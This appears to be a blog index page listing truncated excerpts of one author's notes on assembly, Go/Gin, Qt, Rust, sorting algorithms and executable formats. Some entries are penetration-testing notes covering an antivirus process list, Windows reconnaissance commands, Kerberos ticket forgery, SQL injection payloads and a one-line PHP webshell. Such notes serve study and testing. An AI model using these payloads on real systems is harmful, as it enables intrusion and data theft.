摘要:
第八章 引言 bx, si, di, bp 对于bp来说,它的默认段寄存器为ss 数据所在位置 指令执行之前,所处理的数据在三个地方:内存、cpu内部、端口 指明数据长度 寄存器 word ptr, byte ptr 指令默认,push、pop默认操作字型数据 举例: 假设一段内存单元为: 2000 阅读全文
posted @ 2022-05-27 14:41
nsfoxer
阅读(19)
评论(0)
推荐(0)
摘要:
第十章 call ret ret 与 retf ret 使用栈中的数据,修改 ip,进行程序跳转 CPU执行ret时,进行以下步骤: (ip) = (ss * 16 + sp) (sp) = (sp) + 2 retf 同ret,修改 ip 和 cs (ip) = (ss * 16 + sp) (s 阅读全文
posted @ 2022-05-27 14:41
nsfoxer
阅读(22)
评论(0)
推荐(0)
摘要:
socket 理解socket Socket是应用层与TCP/IP协议族通信的中间软件抽象层,它是一组接口。在设计模式中,Socket其实就是一个门面模式,它把复杂的TCP/IP协议族隐藏在Socket接口后面,对用户来说,一组简单的接口就是全部,让Socket去组织数据,以符合指定的协议。 套 阅读全文
posted @ 2022-05-27 14:41
nsfoxer
阅读(46)
评论(0)
推荐(0)
摘要:
第十一章 标志寄存器 引言 8086CPU标志寄存器有16bits,其中的存储信息叫程序状态字(psw) 标志寄存器按位表示意义 其中空的位无意义,保留 ZF标志位 zero flag 结果 == 0? zf=1 : zf=0 使用指令应注意是否影响标志寄存器 PF标志位 parity flag:结 阅读全文
posted @ 2022-05-27 14:41
nsfoxer
阅读(51)
评论(0)
推荐(0)
摘要:
第五章 [bx] mov ax, [0] ;[0]为常量 对nasm来说 mov ax, ds:[0] mov bx, 0 mov ax, [bx] ;将ds:bx处的内容赋值给ax loop 通常使用loop进行循环,cx作为循环次数 计算2^12 assume cs:code code segm 阅读全文
posted @ 2022-05-27 14:41
nsfoxer
阅读(20)
评论(0)
推荐(0)
摘要:
第六章 包含多个段的程序 数据段 计算 0123h,0456h,0789h……的和 dw:即 define word,在这里后面的数据存储在cs的开始出,即mov bx, 0的前面 start:因为dw开始出是数据,而不是代码(指令),所以使用start指明代码段开始位置 将数据,代码,栈放入不同的 阅读全文
posted @ 2022-05-27 14:41
nsfoxer
阅读(40)
评论(0)
推荐(0)
摘要:
第四章 源程序 汇编源程序: 伪指令(编译器处理) 汇编指令(编译为机器码) 程序返回 应在程序末尾添加返回的程序段 mov ax, 4c00H int 21H 汇编写出到执行 DOS 阅读全文
posted @ 2022-05-27 14:41
nsfoxer
阅读(30)
评论(0)
推荐(0)
摘要:
第三章 寄存器 内存中字的存储 即 在此图中,1地址字型为124EH,2地址字型为0012H DS和[address] ds作为段地址,address为偏移地址,同cs ds --> data segment 将1000H:0的内容读入al中 改变DS内容需要首先将数据存入通用寄存器,不能直接存入 阅读全文
posted @ 2022-05-27 14:41
nsfoxer
阅读(39)
评论(0)
推荐(0)
摘要:
第七章 and or and:位与运算 将第六位设为0 and ax, 1101_1111(2) or:位或运算 将第六位设为1 or ax, 0010_0000(2) 以字符给出数据 用' '(单引号)引用即可 db 'Unix' ;<==> db 75H, 6EH, ... [bx+idata] 阅读全文
posted @ 2022-05-27 14:41
nsfoxer
阅读(37)
评论(0)
推荐(0)
摘要:
第二章 寄存器 8086cpu寄存器: AX BX CX DX SI DI SP BP IP CS SS DS ES PSW 通用寄存器:[A-D]X 为保证兼容性,这四个寄存器可以分为独立8个寄存器使用 | AX | AH(HIGH) | AL(LOW) | | : | : | | | BX | 阅读全文
posted @ 2022-05-27 14:41
nsfoxer
阅读(46)
评论(0)
推荐(0)
摘要:
第九章 转移指令的原理 offset start : mov ax, offset start jmp mov jmp short s ; 机器码 `EB 03`,03表示向后跳转3个字节大小 mov ax, 12 ; 机器码 3位 s: mov ax, ax cpu不需要目的地址实现对IP的修改 阅读全文
posted @ 2022-05-27 14:41
nsfoxer
阅读(28)
评论(0)
推荐(0)
摘要:
Tkinter 1.创建 import tkinter as tk 创建toplevel窗口 使用root = tk.Tk() 创建一个框架 frame = tk.Frame(root) 框架一般使用于在复杂的布局中起到将组建分组的作用 frame.pack() 创建组件 例:button butt 阅读全文
posted @ 2022-05-27 14:41
nsfoxer
阅读(42)
评论(0)
推荐(0)
摘要:
详细解析ESP寄存器与EBP寄存器 参看 :http://www.tenouk.com/Bufferoverflowc/Bufferoverflow2a.html (英) https://blog.csdn.net/u011822516/article/details/20001765 (中) 阅读全文
posted @ 2022-05-27 14:41
nsfoxer
阅读(67)
评论(0)
推荐(0)
摘要:
第一章 汇编组成 汇编指令 伪指令 其它符号 指令和数据 指令与数据是应用上的概念,实际两者没有区别,内存或磁盘的信息,既可是指令,也可是数据 存储器 存储单元组成 cpu对存储器读写 需要: 地址信息(存储单元) 控制信息 数据信息 地址总线 cpu有N个地址总线,则可寻址内存单元2^N 数据总线 阅读全文
posted @ 2022-05-27 14:41
nsfoxer
阅读(29)
评论(0)
推荐(0)
摘要:
libpng是一款C语言编写的比较底层的读写PNG文件的跨平台的库。借助它,你可以轻松读写PNG文件的每一行像素。 因为PNG文件是经过压缩而且格式复杂的图形文件(有的PNG文件甚至像GIF文件一样带动画效果) 而且PNG可以是带透明通道的真彩色图像、不带透明通道的真彩色图像、索引颜色、灰度颜色等各 阅读全文
posted @ 2022-05-27 14:40
nsfoxer
阅读(197)
评论(0)
推荐(0)
摘要:
运行多个服务 gin可以在多个端口启动服务,例如: package main import ( "log" "net/http" "time" "github.com/gin-gonic/gin" "golang.org/x/sync/errgroup" ) var ( g errgroup.Gro 阅读全文
posted @ 2022-05-27 14:40
nsfoxer
阅读(28)
评论(0)
推荐(0)
摘要:
Gin请求参数绑定与多数据格式处理 表单实体绑定(参数绑定) 使用PostForm这种单个获取属性和字段的方式,代码量较多,需要一个一个属性进行获取。gin框架提供了数据结构体和表单提交数据绑定的功能,提高表单数据获取的效率: type UserRegister struct { Usernam 阅读全文
posted @ 2022-05-27 14:40
nsfoxer
阅读(119)
评论(0)
推荐(0)
摘要:
多数据格式返回请求结果 来源:https://www.qfgolang.com/?special=ginkuangjia&pid=2927 gin框架中,支持返回多种请求数据格式。 []byte ... engine := gin.Default() engine.GET("/hello", fun 阅读全文
posted @ 2022-05-27 14:40
nsfoxer
阅读(41)
评论(0)
推荐(0)
摘要:
Gin模板和渲染 模板语法 {{ . }} 取值 <!DOCTYPE html> <html lang="zh-CN"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial- 阅读全文
posted @ 2022-05-27 14:40
nsfoxer
阅读(58)
评论(0)
推荐(0)
摘要:
Gin网络请求与路由处理 来源:https://www.qfgolang.com/?special=ginkuangjia&pid=2783 创建Engine gin框架中,Engine被定义为一个结构体。包含: 路由组 中间件 页面渲染接口 框架配置设置 ..... 创建方式 engine1 阅读全文
posted @ 2022-05-27 14:40
nsfoxer
阅读(72)
评论(0)
推荐(0)
摘要:
2021年 10月 19日 星期二 13:57:23 CST 阅读全文
posted @ 2022-05-27 14:40
nsfoxer
阅读(57)
评论(0)
推荐(0)
摘要:
Go-Gin介绍 介绍 Gin 是一个用 Go (Golang) 编写的 web 框架。 它是一个类似于 martini 但拥有更好性能的 API 框架, 由于 httprouter,速度提高了近 40 倍。 手册: https://gin-gonic.com/zh-cn/docs 安装 设置g 阅读全文
posted @ 2022-05-27 14:40
nsfoxer
阅读(28)
评论(0)
推荐(0)
摘要:
Gin中间件 来源: https://www.qfgolang.com/?special=ginkuangjia&pid=4095 中间件 在web应用服务中,完整的一个业务处理在技术上包含客户端操作、服务器端处理、返回处理结果给客户端三个步骤。 在实际的业务开发和处理中,会有更负责的业务和 阅读全文
posted @ 2022-05-27 14:40
nsfoxer
阅读(64)
评论(0)
推荐(0)
摘要:
Hello, World 来源:https://yar999.gitbook.io/gopl-zh 编译 go run hello.go # 运行 go build hello.go # 编译 package main import "fmt" func main() { fmt.Println(" 阅读全文
posted @ 2022-05-27 14:40
nsfoxer
阅读(31)
评论(0)
推荐(0)
摘要:
基础数据类型 Go语言将数据类型分为四类:基础类型、复合类型、引用类型和接口类型。 graph LR A[基础类型] -->B(数字) A -->C(字符串) A -->D(布尔值) graph LR A[复合类型] --> B[数组] A --> C[结构体] graph LR A[引用类型] - 阅读全文
posted @ 2022-05-27 14:30
nsfoxer
阅读(125)
评论(0)
推荐(0)
摘要:
Go汇编语言 定义 整数变量 // pkg.go package pkg var Id = 1234 go tool compile -S pkg.go “”.Id 表示Id变量,int,8个字节,值 0x4d2 SNOPTRDATA NOPTR表示数据不含指针 阅读全文
posted @ 2022-05-27 14:28
nsfoxer
阅读(64)
评论(0)
推荐(0)
摘要:
Panic异常函数 函数声明 函数声明包括函数名、形式参数列表、返回值列表(可省略)以及函数体。 func name(parameter-list) (result-list) { body } 例: func hypot(x, y float64) float64 { return math.Sq 阅读全文
posted @ 2022-05-27 14:26
nsfoxer
阅读(29)
评论(0)
推荐(0)
摘要:
shell 运行时隐藏golang程序自己的cmd窗口: go build -ldflags -H=windowsgui *.go 阅读全文
posted @ 2022-05-27 14:16
nsfoxer
阅读(45)
评论(0)
推荐(0)
摘要:
程序结构 命名 如果一个名字是在函数内部定义,那么它的就只在函数内部有效。如果是在函数外部定义,那么将在当前包的所有文件中都可以访问。名字的开头字母的大小写决定了名字在包外的可见性。如果一个名字是大写字母开头的(译注:必须是在函数外部定义的包级名字;包级函数名本身也是包级名字),那么它将是导出的,也 阅读全文
posted @ 2022-05-27 14:15
nsfoxer
阅读(37)
评论(0)
推荐(0)
摘要:
沙箱技术实现特点 (((本文仅仅讨论沙箱的逃逸技术问题,不涉及高大上的架构性问题及APT防御性问题,避免问题的无限扩大化。))) 用沙箱动态行为分析检测malware是近几年补充传统AV杀软的通用技术,但是各厂商对沙箱的实现方式和检测方案设计不尽相同,单纯从沙箱角度看,基本分为虚拟化和仿真模拟两大类 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(892)
评论(0)
推荐(0)
摘要:
【C】setjmp的用法 https://www.0xaa55.com/thread-424-1-1.html(出处: 技术宅的结界) setjmp在C语言里用于充当一个可跨函数跳转的跳转标号(可以这么理解。) 首先你需要包含一个头文件:#include<setjmp.h> ,之后就可以使用setj 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(19)
评论(0)
推荐(0)
摘要:
blog.mythsman.com PNG文件格式详解 最近在看隐写术的时候经常需要研究图片文件的二进制文档格式,那么这就很有必要了解我们的图片文件究竟是如何保存的了,今天找了个时间看了下png文件的文档格式。总体还是挺麻烦的,不过毕竟不需要有什么要求,能了解即可。 概述 PNG是20世纪90年代中 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(159)
评论(0)
推荐(0)
摘要:
图解排序算法(一)之3种简单排序(选择,冒泡,直接插入) 排序是数据处理中十分常见且核心的操作,虽说实际项目开发中很小几率会需要我们手动实现,毕竟每种语言的类库中都有n多种关于排序算法的实现。但是了解这些精妙的思想对我们还是大有裨益的。本文简单温习下最基础的三类算法:选择,冒泡,插入。 先定义个交换 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(32)
评论(0)
推荐(0)
摘要:
图解排序算法(三)之堆排序 预备知识 堆排序 堆排序是利用堆这种数据结构而设计的一种排序算法,堆排序是一种**选择排序,**它的最坏,最好,平均时间复杂度均为O(nlogn),它也是不稳定排序。首先简单了解下堆结构。 堆 堆是具有以下性质的完全二叉树:每个结点的值都大于或等于其左右孩子结点的值,称为 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(18)
评论(0)
推荐(0)
摘要:
windows历程 Hello World #include <windows.h> int WINAPI WinMain(HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nCmdShow) { Me 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(27)
评论(0)
推荐(0)
摘要:
Windows 常用消息及含义 | 消息范围 | 说明 | | | | | 0 ~ WM_USER – 1 | 系统消息 | | WM_USER ~ 0x7FFF | 自定义窗口类整数消息 | | WM_APP ~ 0xBFFF | 应用程序自定义消息 | | 0xC000 ~ 0xFFFF | 应 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(94)
评论(0)
推荐(0)
摘要:
简介 第一个程序 窗口类:QWidget, QMainWindow, QDialog main: #include "mywidget.h" #include <QApplication> //包含一个应用程序类的头文件 int main(int argc, char *argv[]) { // 应 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(30)
评论(0)
推荐(0)
摘要:
按钮 #include "mywidget.h" #include <qpushbutton.h> MyWidget::MyWidget(QWidget *parent) : QWidget(parent) { // first button QPushButton *btn = new QPush 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(28)
评论(0)
推荐(0)
摘要:
资源文件 Qt 资源系统是一个跨平台的资源机制,用于将程序运行时所需要的资源以二进制的形式存储于可执行文件内部。如果你的程序需要加载特定的资源(图标、文本翻译等),那么,将其放置在资源文件中,就再也不需要担心这些文件的丢失。也就是说,如果你将资源以资源文件形式存储,它是会编译到可执行文件内部。 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(33)
评论(0)
推荐(0)
摘要:
MOC Qt “扩展”了标准 C++。所谓“扩展”,实际是在使用标准 C++ 编译器编译 Qt 源程序之前,Qt 先使用一个叫做 moc(Meta Object Compiler,元对象编译器)的工具,先对 Qt 源代码进行一次预处理(注意,这个预处理与标准 C++ 的预处理有所不同。Qt 的 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(40)
评论(0)
推荐(0)
摘要:
事件 介绍 事件(event)是由系统或者 Qt 本身在不同的时刻发出的。当用户按下鼠标、敲下键盘,或者是窗口需要重新绘制的时候,都会发出一个相应的事件。一些事件在对用户操作做出响应时发出,如键盘事件等;另一些事件则是由系统自动发出,如计时器事件。 事件也就是我们通常说的“事件驱动(even 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(64)
评论(0)
推荐(0)
摘要:
文件对话框 QFileDialog::getOpenFileName()来获取需要打开的文件 QString getOpenFileName(QWidget * parent = 0, const QString & caption = QString(), const QString & dir 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(33)
评论(0)
推荐(0)
摘要:
Qt 文件 Qt 通过QIODevice提供了对 I/O 设备的抽象,这些设备具有读写字节块的能力。 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(32)
评论(0)
推荐(0)
摘要:
Qt绘制系统 绘制系统 Qt 的绘图系统允许使用相同的 API 在屏幕和其它打印设备上进行绘制。整个绘图系统基于 QPainter,QPainterDevice 和 QPaintEngine 三个类。 QPainter: 来执行绘制操作 QPainterDevice: 是一个二维空间的抽象,这个 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(59)
评论(0)
推荐(0)
摘要:
QT简介 QT是c++的一个应用程序框架。包含大量GUI库,其他库等。 跨平台GUI实现方法: API 映射:API 映射是说,界面库使用同一套 API,将其映射到不同的底层平台上面。大体相当于将不同平台的 API 提取公共部分。 API 模拟:前面提到,API 映射会“缺失”不同平台的特定功能,而 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(53)
评论(0)
推荐(0)
摘要:
Graphics View Framework Graphics View 提供了一种接口,用于管理大量自定义的 2D 图形元素,并与之进行交互;还提供了用于将这些元素进行可视化显示的观察组件,并支持缩放和旋转。 Graphics View 框架包含了一套完整的事件体系,可以用于与场景中的元 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(32)
评论(0)
推荐(0)
摘要:
MainWindows 主窗口 Qt Main Window Framework 通常,各个图形界面框架都会使用操作系统本地代码来生成一个窗口。所以,你会看到在 KDE 上面,主窗口的标题栏是 KDE 样式的;在 Windows 平台上,标题栏是 Windows 风格的。如果你不喜欢本地样式,比 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(43)
评论(0)
推荐(0)
摘要:
对话框 分类 Qt 中使用 QDialog 类实现对话框。就像主窗口一样,我们通常会设计一个类继承 QDialog。 QDialog(及其子类,以及所有 Qt::Dialog 类型的类)的对于其 parent 指针都有额外的解释:如果 parent 为 NULL,则该对话框会作为一个顶层窗口 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(40)
评论(0)
推荐(0)
摘要:
菜单栏、工具栏和状态栏 Qt 将用户与界面进行交互的元素抽象为一种“动作”,使用 QAction 类表示。QAction 可以添加到菜单上、工具栏上。 Qt 中,表示菜单的类是 QMenuBar。QMenuBar 代表的是窗口最上方的一条菜单栏。使用其 addMenu()函数为其添加菜单。 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(83)
评论(0)
推荐(0)
摘要:
布局管理器 定位 我们必须要指定组件放在哪里,以便窗口能够按照我们需要的方式进行渲染。Qt 提供了两种组件定位机制:绝对定位和布局定位。 绝对定位:给出这个组件的坐标和长宽值。 相对定位:布局。 #include "mainwindow.h" #include <QApplication> #i 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(22)
评论(0)
推荐(0)
摘要:
Qt模块 Qt 5 与 Qt 4 最大的一个区别之一是底层架构有了修改。Qt 5 引入了模块化的概念,将众多功能细分到几个模块之中。Qt 4 也有模块的概念,但是是一种很粗的划分,而 Qt 5 则更加细化。 Qt 5 模块分为 Essentials Modules 和 Add-on Modu 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(45)
评论(0)
推荐(0)
摘要:
信号槽 所谓信号槽,实际就是观察者模式。当某个事件发生之后,比如,按钮检测到自己被点击了一下,它就会发出一个信号(signal)。这种发出是没有目的的,类似广播。如果有对象对这个信号感兴趣,它就会使用连接(connect)函数,意思是,用自己的一个函数(成为槽(slot))来处理这个信号。也就是 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(27)
评论(0)
推荐(0)
摘要:
RUST入门 参考:https://course.rs Hello World mkdir -p projects/hello_world/ cd projects/hello_world main.rs文件 fn main() { let penguin_data = "\ common name 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(135)
评论(0)
推荐(0)
摘要:
RUST实践 密码 自定义密码 use rand::Rng; pub fn main() { const CHARSET: &[u8] = b"abcdefghijklmnopqrstuvwxyz\ 0123456789)(*&^%$#@!~)"; const PASSWORD_LEN: usize 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(172)
评论(0)
推荐(0)
摘要:
opencv-rust 此文使用项目: opencv-rust 学习参考: opencv c++ version: rust 2021 opencv 4.5.4 使用 在cargo.toml添加: [package] name = "game-ip" version = "0.1.0" editio 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(336)
评论(0)
推荐(0)
摘要:
正则表达式 2. 元字符 正则表达式主要依赖于元字符。 元字符不代表他们本身的字面意思,他们都有特殊的含义。一些元字符写在方括号中的时候有一些特殊的意思。以下是一些元字符的介绍: | 元字符 | 描述 | | | | | . | 句号匹配任意单个字符除了换行符。 | | [ ] | 字符种类。匹配方 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(84)
评论(0)
推荐(0)
摘要:
# 无用的知识 [toc] ## Linux ### 图形界面 - 默认打开程序被决定: xdg-open ~/.config/mine.list /usr/share/mime - 图形界面的解压缩可以使用: xarchiver - firefox在90.0版本左右有个bug,大概是网络阻塞会导致 阅读全文
posted @ 2022-05-27 14:11
nsfoxer
阅读(113)
评论(0)
推荐(0)
摘要:
图解排序算法(四)之归并排序 基本思想 归并排序(MERGE-SORT)是利用归并的思想实现的排序方法,该算法采用经典的分治(divide-and-conquer)策略(分治法将问题分(divide)成一些小的问题然后递归求解,而**治(conquer)的阶段则将分的阶段得到的各答案"修补"在一起, 阅读全文
posted @ 2022-05-27 14:10
nsfoxer
阅读(22)
评论(0)
推荐(0)
摘要:
图解排序算法(二)之希尔排序 希尔排序是希尔(Donald Shell)于1959年提出的一种排序算法。希尔排序也是一种插入排序,它是简单插入排序经过改进之后的一个更高效的版本,也称为缩小增量排序,同时该算法是冲破O(n2)的第一批算法之一。本文会以图解的方式详细介绍希尔排序的基本思想及其代码实现。 阅读全文
posted @ 2022-05-27 14:10
nsfoxer
阅读(32)
评论(0)
推荐(0)
摘要:
图解排序算法(五)之快速排序——三数取中法 快速排序由C. A. R. Hoare在1962年提出。它的基本思想是:通过一趟排序将要排序的数据分割成独立的两部分,其中一部分的所有数据都比另外一部分的所有数据都要小,然后再按此方法对这两部分数据分别进行快速排序,整个排序过程可以递归进行,以此达到整个数 阅读全文
posted @ 2022-05-27 14:10
nsfoxer
阅读(47)
评论(0)
推荐(0)
摘要:
csrf cross-site request forgery xss: 利用客户端对站点信任、 csrf: 利用站点对已认证的客户端的信任 业务逻辑漏洞 利用条件 客户端已完成身份认证 新的请求不需要新的身份认证或确认机制 攻击者了解web app请求的参数构造 诱使用户触发攻击指令 阅读全文
posted @ 2022-05-27 14:10
nsfoxer
阅读(31)
评论(0)
推荐(0)
摘要:
"360tray.exe": "360安全卫士-实时保护", "360safe.exe": "360安全卫士-主程序", "ZhuDongFangYu.exe": "360安全卫士-主动防御", "360sd.exe": "360杀毒", "a2guard.exe": "a-squared杀毒", 阅读全文
posted @ 2022-05-27 14:08
nsfoxer
阅读(99)
评论(0)
推荐(0)
摘要:
原码、反码和补码 用反码表示有符号数时,符号位保持不变,数值大小定义为 用补码表示有符号数时,符号位保持不变,数值大小定义为 正数的原码、反码和补码形式相同。求负数的补码时,为了避免做减法运算,一般方法是:先求出负数的反码(将原码的数值位逐位求反),然后在最低位加1即可得到补码,即 (N)补码= 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(45)
评论(0)
推荐(0)
摘要:
内网信息收集 windows 1、检查当前shell权限 whoami /user && whoami /priv 2、查看系统信息 systeminfo 3、tcp/udp网络连接状态 netstat -ano 4、机器名 hostname 5、查看当前操作系统 ver 6、查杀软 wmic /N 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(43)
评论(0)
推荐(0)
摘要:
一句话下载器 PowerShell File Download PowerShell 是一种winodws原生的脚本语言,对于熟练使用它的人来说,可以实现很多复杂的功能。 在windows 2003之中默认支持这种脚本。 下面这两条指令实现了从Internet网络下载一个文件。 $p = New-O 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(107)
评论(0)
推荐(0)
摘要:
高级搜索的使用方法 inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用. intext: 只搜索网页部分中包含的文字(也就是忽略了标题,URL等的文字). site: 可以限制你搜索范围的域名. filetype: 搜索文件的后缀或者扩展名 intitle: 限 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(109)
评论(0)
推荐(0)
摘要:
远程加载恶意Word模版文件 利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器请求恶意模板并执行恶意模板上的恶意代码。 这里,我们借助CobaltStrike生成office宏病毒,在将恶意宏嵌入到W 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(47)
评论(0)
推荐(0)
摘要:
Cobalt Strike基本使用 来源: https://xz.aliyun.com/t/3975 简介 Cobalt Strike: C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike的C/S架构 客户端(Client GUI) 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(76)
评论(0)
推荐(0)
摘要:
内网渗透常用端口 53 DNS服务,在使用中需要用到TCP/UDP 53端口,AD域的核心就是DNS服务器,AD通过DNS服务器定位资源 88 Kerberos服务,在使用中需要用到TCP/UDP 88端口,Kerberos密钥分发中心(KDC) 在该端口上侦听Ticket请求 135 135端口主 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(85)
评论(0)
推荐(0)
摘要:
域渗透之金票据学习 金票据(golden ticket):伪造票据授予票据(TGT),也被称为认证票据。 krbtgt账户:每个域控制器都有一个“krbtgt”的用户账户,是KDC的服务账户,用来创建票据授予服务(TGS)加密的密钥。 0x01金票据利用条件 域控中krbtgt账户NTLM密码哈希 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(107)
评论(0)
推荐(0)
摘要:
内网渗透测试之域渗透详解 在渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大风险,这个时候就需要做内网的域渗透。 通常,我们是以获得域控制 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(273)
评论(0)
推荐(0)
摘要:
域渗透之银票据学习 银票据(silver ticket):它不需要和域控制器进行通信,原理是伪造TGS,使用的是计算机账户的hash进行加密的,所以只能访问指定的权限,也就是只能访问特定的服务。 0x01 银票据利用条件 域控计算机账户的ntlm hash 域中的sid值 一台域中主机 与其说是一种 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(36)
评论(0)
推荐(0)
摘要:
术语 工作组:工作组是局域网中的一个概念,他是长久的资源管理模式。默认情况下使用工作组方式进行资源管理,将不同的computer按照不同的要求分类到不同的组 域:用来描述一种架构,和“工作组”相对应,由工作组升级而来的高级架构,域 (Domain)是一个有安全边界的计算机集合( 安全边界,意思是在两 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(79)
评论(0)
推荐(0)
摘要:
Linux下反编译Android apk文件 工具 反编译过程中需要用到三个工具:apktool、dex2jar和jd-Gui。 apktool:反编译出apk所需要的资源文件和布局设置文件。 dex2jar:反编译出jar文件,即apk的源程序字节码 jd-GUI:查看dex2jar反编译出来的j 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(90)
评论(0)
推荐(0)
摘要:
windows截屏 PSR(Problem Steps Recorder),直译为问题步骤记录器,在Windows 早期的系统中,采用WER(Windows Error Reporting)来收集系统的错误报告,但这些报告往往包含的信息太少以致于无法解决实际问题。 为此,微软从Windows 7系统 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(118)
评论(0)
推荐(0)
摘要:
sql手工注入 mysql #当前数据库库名,用户名 union select database(), user() #找所有数据库库名 select+schema_name+from+information_schema.schemata limit 1,1; #找一个数据库库中有哪些表名 sel 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(79)
评论(0)
推荐(0)
摘要:
webshell php <?php echo shell_exec($_GET['cmd']);?> 中国菜刀 可能被IDS WAF AV 扫描器 查杀 WeBoCoo(Web Backdoor Cookie)-->php 类终端shell 通信使用cookie传输 `服务端生成` webacoo 阅读全文
posted @ 2022-05-27 14:00
nsfoxer
阅读(55)
评论(0)
推荐(0)
摘要:
一、引言 PE头结构定义 --> winint.h PE头结构有64bits与32bits之分,一般在名称上会表现出来 64bits与32bits头结构基本一致,只是进行简单扩展 基地址 相对虚拟地址 文件偏移地址 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(27)
评论(0)
推荐(0)
摘要:
三、块(节) PE文件到内存的映射 windows不会将文件全部加载至内存,采用类似内存映射文件机制 一般,会处理以下内容: 内存页属性 节的偏移地址 节的尺寸 不进行映射的节 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(17)
评论(0)
推荐(0)
摘要:
区块表与区块 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(33)
评论(0)
推荐(0)
摘要:
二、 MS-DOS头部 PE文件头部第一个字节起始于一个传统的MS-DOS头部,IMAGE-DOS-IHEADER struct _IMAGE_DOS_IHEADER{ 0X00 WORD e_magic; // MAGIC DOS sigture MZ(4Dh 5Ah) dos可执行文件 //.. 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(16)
评论(0)
推荐(0)
摘要:
ELF文件解析(二):ELF header详解 转载:https://www.cnblogs.com/jiqingwu/p/elf_explore_2.html 上一篇讲了ELF文件的总体布局,以及section和segment的概念。按照计划,今天继续讲 ELF header。 讲新的内容之前,先 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(42)
评论(0)
推荐(0)
摘要:
ELF格式探析之三:sections 前文链接: ELF格式探析之一:Segment和Section ELF格式探析之二:文件头ELF Header详解 今天我们讲对目标文件(可重定位文件)和可执行文件都很重要的section。 我们在讲ELF Header的时候,讲到了section header 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(30)
评论(0)
推荐(0)
摘要:
ELF文件解析(一):Segment和Section 转载:https://www.cnblogs.com/jiqingwu/p/elf_format_research_01.html ELF 是Executable and Linking Format的缩写,即可执行和可链接的格式,是Unix/L 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(45)
评论(0)
推荐(0)
摘要:
小甲鱼PE详解之输出表(导出表)详解(PE详解09) 引言 当PE 文件被执行的时候,Windows 加载器将文件装入内存并将导入表(Export Table) 登记的动态链接库(一般是DLL 格式)文件一并装入地址空间,再根据DLL 文件中的函数导出信息对被执行文件的IAT 进行修正。 ( 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(72)
评论(0)
推荐(0)
摘要:
小甲鱼PE详解之基址重定位详解(PE详解10) 今天有一个朋友发短消息问我说“老师,为什么PE的格式要讲的这么这么细,这可不是一般的系哦”。其实之所以将PE结构放在解密系列继基础篇之后讲并且尽可能细致的讲,不是因为小甲鱼没事找事做,主要原因是因为PE结构非常重要,再说做这个课件的确是很费神的事哈。在 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(73)
评论(0)
推荐(0)
摘要:
小甲鱼PE详解之区块表(节表)和区块(节)(PE详解04) PE文件到内存的映射 在执行一个PE文件的时候,windows 并不在一开始就将整个文件读入内存的,二十采用与内存映射文件类似的机制。也就是说,windows 装载器在装载的时候仅仅建立好虚拟地址和PE文件之间的映射关系。 当且仅当真正执行 阅读全文
posted @ 2022-05-27 13:55
nsfoxer
阅读(33)
评论(0)
推荐(0)
摘要:
